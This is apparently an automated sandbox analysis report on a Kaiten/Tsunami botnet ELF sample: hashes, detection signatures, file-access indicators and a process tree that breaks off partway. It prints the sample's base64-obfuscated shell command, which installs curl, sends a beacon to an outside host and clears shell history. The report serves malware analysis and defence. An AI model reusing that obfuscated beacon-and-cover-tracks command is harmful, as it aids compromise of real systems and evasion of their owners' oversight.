kaiten | 0eb2c98d14fce41db0ac9352484438fc40489d6f40c915b659ecc84342aa83a6

Analysis

max time kernel
19s
max time network
66s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20231221-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20231221-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
09-01-2024 18:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f09c0d5883a221d2e5f762480e946a78.elf
Size

42KB
MD5

f09c0d5883a221d2e5f762480e946a78
SHA1

506386147d393cef81019dda55ac85125914c6be
SHA256

0eb2c98d14fce41db0ac9352484438fc40489d6f40c915b659ecc84342aa83a6
SHA512

a7c13cbb7855172fcb6fea29da30ff256664fc9515fc25019579d9db1344014804316e43e919e95b6110b77d4023a340639b8cdb63b4a6022437316320793c20
SSDEEP

768:oZHhN4I6FWJosiC8bOi6c9rasu7upif9EIgXEB2QeXeoIz8Vj2zc3pTJBXG1wzq:+L4I6zdAi6c94SIgUBVeXO8Azc3pjSw+

Score

10^/10

kaiten botnet

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1546-1-0x0000000000400000-0x0000000000416f68-memory.dmp	family_kaiten2

Detects Kaiten/Tsunami payload 1 IoCs

resource	yara_rule
behavioral1/memory/1546-1-0x0000000000400000-0x0000000000416f68-memory.dmp	family_kaiten

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten

Reads runtime system information 59 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/self/fd	Process not Found
File opened for reading	/proc/filesystems	id
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/sys/kernel/osrelease	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/self/exe	f09c0d5883a221d2e5f762480e946a78.elf
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/sys/kernel/ngroups_max	apt-get
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/1/sched	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	sed

Writes file to tmp directory 48 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/fileutl.message.jEU2rO	apt-get
File opened for modification	/tmp/fileutl.message.ht0WOp	apt-get
File opened for modification	/tmp/fileutl.message.hXO3CC	apt-get
File opened for modification	/tmp/fileutl.message.0k9Blq	apt-get
File opened for modification	/tmp/apt.data.DDYK0c	Process not Found
File opened for modification	/tmp/apt-key-gpghome.JW4YtzvHzt/pubring.gpg	touch
File opened for modification	/tmp/fileutl.message.kkKKN8	apt-get
File opened for modification	/tmp/apt.sig.ghSisV	Process not Found
File opened for modification	/tmp/apt-key-gpghome.aQCzlyhCLU/pubring.gpg	touch
File opened for modification	/tmp/apt-key-gpghome.aQCzlyhCLU/gpg.1.sh	apt-key
File opened for modification	/tmp/fileutl.message.4HyP9N	apt-get
File opened for modification	/tmp/fileutl.message.v1tq6c	apt-get
File opened for modification	/tmp/apt.conf.Lr0svM	Process not Found
File opened for modification	/tmp/apt-key-gpghome.YanZVww2GG/pubring.gpg	touch
File opened for modification	/tmp/apt.sig.J5nw5Q	Process not Found
File opened for modification	/tmp/apt.sig.Tm3bAK	Process not Found
File opened for modification	/tmp/apt.data.op1KVx	Process not Found
File opened for modification	/tmp/fileutl.message.kJNYTc	apt-get
File opened for modification	/tmp/fileutl.message.C9X3L0	apt-get
File opened for modification	/tmp/apt-key-gpghome.YanZVww2GG/pubring.gpg	apt-key
File opened for modification	/tmp/fileutl.message.Ntmzin	apt-get
File opened for modification	/tmp/apt-key-gpghome.JW4YtzvHzt/gpg.1.sh	apt-key
File opened for modification	/tmp/apt-key-gpghome.JWaRO2lmI1/pubring.gpg	touch
File opened for modification	/tmp/apt-key-gpghome.JWaRO2lmI1/pubring.orig.gpg	cp
File opened for modification	/tmp/apt.conf.4YQd16	Process not Found
File opened for modification	/tmp/fileutl.message.WTkFrp	apt-get
File opened for modification	/tmp/fileutl.message.8snUvd	apt-get
File opened for modification	/tmp/fileutl.message.2L2UUO	apt-get
File opened for modification	/tmp/apt-key-gpghome.JW4YtzvHzt/pubring.gpg	apt-key
File opened for modification	/tmp/apt-key-gpghome.aQCzlyhCLU/pubring.orig.gpg	cp
File opened for modification	/tmp/fileutl.message.OhixOM	apt-get
File opened for modification	/tmp/fileutl.message.XKz7hp	apt-get
File opened for modification	/tmp/fileutl.message.LvugNB	apt-get
File opened for modification	/tmp/apt-key-gpghome.YanZVww2GG/pubring.orig.gpg	cp
File opened for modification	/tmp/apt.data.PxDrhB	Process not Found
File opened for modification	/tmp/apt-key-gpghome.JWaRO2lmI1/gpg.1.sh	apt-key
File opened for modification	/tmp/fileutl.message.kJtl8B	apt-get
File opened for modification	/tmp/apt-key-gpghome.JW4YtzvHzt/pubring.orig.gpg	cp
File opened for modification	/tmp/apt-key-gpghome.JWaRO2lmI1/pubring.gpg	apt-key
File opened for modification	/tmp/apt-key-gpghome.aQCzlyhCLU/pubring.gpg	apt-key
File opened for modification	/tmp/fileutl.message.hNJJw0	apt-get
File opened for modification	/tmp/fileutl.message.DIjed1	apt-get
File opened for modification	/tmp/apt.sig.mIS6Ku	Process not Found
File opened for modification	/tmp/apt-key-gpghome.YanZVww2GG/gpg.1.sh	apt-key
File opened for modification	/tmp/apt.conf.HvkBT6	Process not Found
File opened for modification	/tmp/apt.conf.CKeDeX	Process not Found
File opened for modification	/tmp/apt.data.S0foTJ	Process not Found
File opened for modification	/tmp/fileutl.message.PngA9W	apt-get

/tmp/f09c0d5883a221d2e5f762480e946a78.elf
/tmp/f09c0d5883a221d2e5f762480e946a78.elf
1⤵
- Reads runtime system information
PID:1546
- /bin/sh
  sh -c "echo aWYgISB0eXBlIGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4gaWYgdHlwZSBhcHQtZ2V0IDI+L2Rldi9udWxsIDE+L2Rldi9udWxsOyB0aGVuIGFwdC1nZXQgdXBkYXRlIC0tZml4LW1pc3NpbmcgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyBhcHQtZ2V0IGluc3RhbGwgLXkgY3VybCAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbCA7IGFwdC1nZXQgaW5zdGFsbCAteSAtLXJlaW5zdGFsbCBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgZmkKaWYgdHlwZSB5dW0gMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4geXVtIGNsZWFuIGFsbCAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbCA7IHl1bSBpbnN0YWxsIC15IGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyB5dW0gcmVpbnN0YWxsIC15IGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyBmaQppZiB0eXBlIGFwayAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbDsgdGhlbiBhcGsgdXBkYXRlIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgYXBrIGFkZCBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgZmkgOyBmaSA7IGN1cmwgLXNMayBodHRwOi8vY2hpbWFlcmEuY2MvbG9nL2luZi5waHAgLW8gL2Rldi9udWxsIDsgaGlzdG9yeSAtYyA7IGNsZWFyCgo= | base64 -d | bash"
  2⤵
  PID:1547
- - /usr/bin/base64
    base64 -d
    3⤵
    PID:1549
- - /bin/bash
    bash
    3⤵
    PID:1550
  - - /usr/bin/apt-get
      apt-get update --fix-missing
      4⤵
      Reads runtime system information
      Writes file to tmp directory
      PID:1551
    - - /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        5⤵
        Reads runtime system information
        
        PID:1552
    - - /usr/lib/apt/methods/http
        
        /usr/lib/apt/methods/http
        5⤵
        
        PID:1553
    - - /usr/lib/apt/methods/http
        
        /usr/lib/apt/methods/http
        5⤵
        
        PID:1560
    - - /usr/lib/apt/methods/http
        
        /usr/lib/apt/methods/http
        5⤵
        
        PID:1561
    - - /usr/lib/apt/methods/gpgv
        
        /usr/lib/apt/methods/gpgv
        5⤵
        
        PID:1797
    - - /usr/lib/apt/methods/gpgv
        
        /usr/lib/apt/methods/gpgv
        5⤵
        
        PID:1798

/bin/sh
sh -c "[ ! -e /run/systemd/system ] || [ \$(id -u) -ne 0 ] || systemctl start --no-block apt-news.service esm-cache.service || true"
1⤵
PID:1555
- /usr/bin/id
  id -u
  2⤵
  - Reads runtime system information
  PID:1556
- /bin/systemctl
  systemctl start --no-block apt-news.service esm-cache.service
  2⤵
  - Reads runtime system information
  PID:1557

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.mIS6Ku /tmp/apt.data.DDYK0c
1⤵
- Writes file to tmp directory
PID:1800
- /usr/bin/apt-config
  apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
  2⤵
  PID:1802
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1803
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
  2⤵
  PID:1804
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1805
- /usr/bin/apt-config
  apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
  2⤵
  PID:1806
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1807
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
  2⤵
  PID:1808
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1809
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
  2⤵
  PID:1810
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1811
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
  2⤵
  PID:1812
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1813
- /usr/bin/apt-config
  apt-config shell GPGV Apt::Key::gpgvcommand
  2⤵
  PID:1815
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1816
- /bin/mktemp
  mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
  2⤵
  PID:1817
- /bin/chmod
  chmod 700 /tmp/apt-key-gpghome.YanZVww2GG
  2⤵
  PID:1818
- /bin/readlink
  readlink -f /tmp/apt-key-gpghome.YanZVww2GG
  2⤵
  PID:1819
- /bin/rm
  rm -f /tmp/apt-key-gpghome.YanZVww2GG/pubring.gpg
  2⤵
  PID:1820
- /usr/bin/touch
  touch /tmp/apt-key-gpghome.YanZVww2GG/pubring.gpg
  2⤵
  - Writes file to tmp directory
  PID:1821
- /usr/bin/apt-config
  apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
  2⤵
  PID:1822
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1823
- /bin/readlink
  readlink -f /etc/apt/trusted.gpg.d/
  2⤵
  PID:1824
- /usr/bin/find
  find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
  2⤵
  - Reads runtime system information
  PID:1825
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1830
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1832
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:1834
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:1836
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:1838
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:1840
- /bin/cp
  cp -a /tmp/apt-key-gpghome.YanZVww2GG/pubring.gpg /tmp/apt-key-gpghome.YanZVww2GG/pubring.orig.gpg
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1841
- /usr/bin/gpgv
  gpgv --homedir /tmp/apt-key-gpghome.YanZVww2GG --keyring /tmp/apt-key-gpghome.YanZVww2GG/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.mIS6Ku /tmp/apt.data.DDYK0c
  2⤵
  PID:1848
- /usr/bin/gpgconf
  gpgconf --kill all
  2⤵
  PID:1849
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart KILLAGENT
    3⤵
    PID:1850
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
    3⤵
    PID:1851
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
    3⤵
    PID:1852
- /bin/rm
  rm -rf /tmp/apt-key-gpghome.YanZVww2GG
  2⤵
  PID:1853

/usr/bin/sort
sort
1⤵
PID:1828

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1844

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1847

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.J5nw5Q /tmp/apt.data.PxDrhB
1⤵
- Writes file to tmp directory
PID:1855
- /usr/bin/apt-config
  apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
  2⤵
  PID:1857
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1858
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
  2⤵
  PID:1859
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1860
- /usr/bin/apt-config
  apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
  2⤵
  PID:1861
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1862
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
  2⤵
  PID:1863
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1864
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
  2⤵
  PID:1865
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1866
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
  2⤵
  PID:1867
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1868
- /usr/bin/apt-config
  apt-config shell GPGV Apt::Key::gpgvcommand
  2⤵
  PID:1870
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1871
- /bin/mktemp
  mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
  2⤵
  PID:1872
- /bin/chmod
  chmod 700 /tmp/apt-key-gpghome.JW4YtzvHzt
  2⤵
  PID:1873
- /bin/readlink
  readlink -f /tmp/apt-key-gpghome.JW4YtzvHzt
  2⤵
  PID:1874
- /bin/rm
  rm -f /tmp/apt-key-gpghome.JW4YtzvHzt/pubring.gpg
  2⤵
  PID:1875
- /usr/bin/touch
  touch /tmp/apt-key-gpghome.JW4YtzvHzt/pubring.gpg
  2⤵
  - Writes file to tmp directory
  PID:1876
- /usr/bin/apt-config
  apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
  2⤵
  PID:1877
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1878
- /bin/readlink
  readlink -f /etc/apt/trusted.gpg.d/
  2⤵
  PID:1879
- /usr/bin/find
  find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
  2⤵
  - Reads runtime system information
  PID:1880
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1885
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1887
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:1889
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:1891
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:1893
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:1895
- /bin/cp
  cp -a /tmp/apt-key-gpghome.JW4YtzvHzt/pubring.gpg /tmp/apt-key-gpghome.JW4YtzvHzt/pubring.orig.gpg
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1896
- /usr/bin/gpgv
  gpgv --homedir /tmp/apt-key-gpghome.JW4YtzvHzt --keyring /tmp/apt-key-gpghome.JW4YtzvHzt/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.J5nw5Q /tmp/apt.data.PxDrhB
  2⤵
  PID:1903
- /usr/bin/gpgconf
  gpgconf --kill all
  2⤵
  PID:1904
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart KILLAGENT
    3⤵
    PID:1905
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
    3⤵
    PID:1906
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
    3⤵
    PID:1907
- /bin/rm
  rm -rf /tmp/apt-key-gpghome.JW4YtzvHzt
  2⤵
  PID:1908

/usr/bin/sort
sort
1⤵
PID:1883

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1899

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1902

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.Tm3bAK /tmp/apt.data.op1KVx
1⤵
- Writes file to tmp directory
PID:1910
- /usr/bin/apt-config
  apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
  2⤵
  PID:1912
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1913
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
  2⤵
  PID:1914
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1915
- /usr/bin/apt-config
  apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
  2⤵
  PID:1916
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1917
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
  2⤵
  PID:1918
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1919
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
  2⤵
  PID:1920
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1921
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
  2⤵
  PID:1922
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1923
- /usr/bin/apt-config
  apt-config shell GPGV Apt::Key::gpgvcommand
  2⤵
  PID:1925
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1926
- /bin/mktemp
  mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
  2⤵
  PID:1927
- /bin/chmod
  chmod 700 /tmp/apt-key-gpghome.JWaRO2lmI1
  2⤵
  PID:1928
- /bin/readlink
  readlink -f /tmp/apt-key-gpghome.JWaRO2lmI1
  2⤵
  PID:1929
- /bin/rm
  rm -f /tmp/apt-key-gpghome.JWaRO2lmI1/pubring.gpg
  2⤵
  PID:1930
- /usr/bin/touch
  touch /tmp/apt-key-gpghome.JWaRO2lmI1/pubring.gpg
  2⤵
  - Writes file to tmp directory
  PID:1931
- /usr/bin/apt-config
  apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
  2⤵
  PID:1932
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1933
- /bin/readlink
  readlink -f /etc/apt/trusted.gpg.d/
  2⤵
  PID:1934
- /usr/bin/find
  find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
  2⤵
  - Reads runtime system information
  PID:1935
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1940
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1942
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:1944
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:1946
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:1948
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:1950
- /bin/cp
  cp -a /tmp/apt-key-gpghome.JWaRO2lmI1/pubring.gpg /tmp/apt-key-gpghome.JWaRO2lmI1/pubring.orig.gpg
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1951
- /usr/bin/gpgv
  gpgv --homedir /tmp/apt-key-gpghome.JWaRO2lmI1 --keyring /tmp/apt-key-gpghome.JWaRO2lmI1/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.Tm3bAK /tmp/apt.data.op1KVx
  2⤵
  PID:1958
- /usr/bin/gpgconf
  gpgconf --kill all
  2⤵
  PID:1959
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart KILLAGENT
    3⤵
    PID:1960
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
    3⤵
    PID:1961
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
    3⤵
    PID:1962
- /bin/rm
  rm -rf /tmp/apt-key-gpghome.JWaRO2lmI1
  2⤵
  PID:1963

/usr/bin/sort
sort
1⤵
PID:1938

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1954

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1957

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.ghSisV /tmp/apt.data.S0foTJ
1⤵
- Writes file to tmp directory
PID:1965
- /usr/bin/apt-config
  apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
  2⤵
  PID:1967
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1968
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
  2⤵
  PID:1969
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1970
- /usr/bin/apt-config
  apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
  2⤵
  PID:1971
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1972
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
  2⤵
  PID:1973
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1974
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
  2⤵
  PID:1975
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1976
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
  2⤵
  PID:1977
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1978
- /usr/bin/apt-config
  apt-config shell GPGV Apt::Key::gpgvcommand
  2⤵
  PID:1980
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1981
- /bin/mktemp
  mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
  2⤵
  PID:1982
- /bin/chmod
  chmod 700 /tmp/apt-key-gpghome.aQCzlyhCLU
  2⤵
  PID:1983
- /bin/readlink
  readlink -f /tmp/apt-key-gpghome.aQCzlyhCLU
  2⤵
  PID:1984
- /bin/rm
  rm -f /tmp/apt-key-gpghome.aQCzlyhCLU/pubring.gpg
  2⤵
  PID:1985
- /usr/bin/touch
  touch /tmp/apt-key-gpghome.aQCzlyhCLU/pubring.gpg
  2⤵
  - Writes file to tmp directory
  PID:1986
- /usr/bin/apt-config
  apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
  2⤵
  PID:1987
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1988
- /bin/readlink
  readlink -f /etc/apt/trusted.gpg.d/
  2⤵
  PID:1989
- /usr/bin/find
  find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
  2⤵
  - Reads runtime system information
  PID:1990
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1995
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1997
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:1999
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:2001
- /usr/bin/cmp
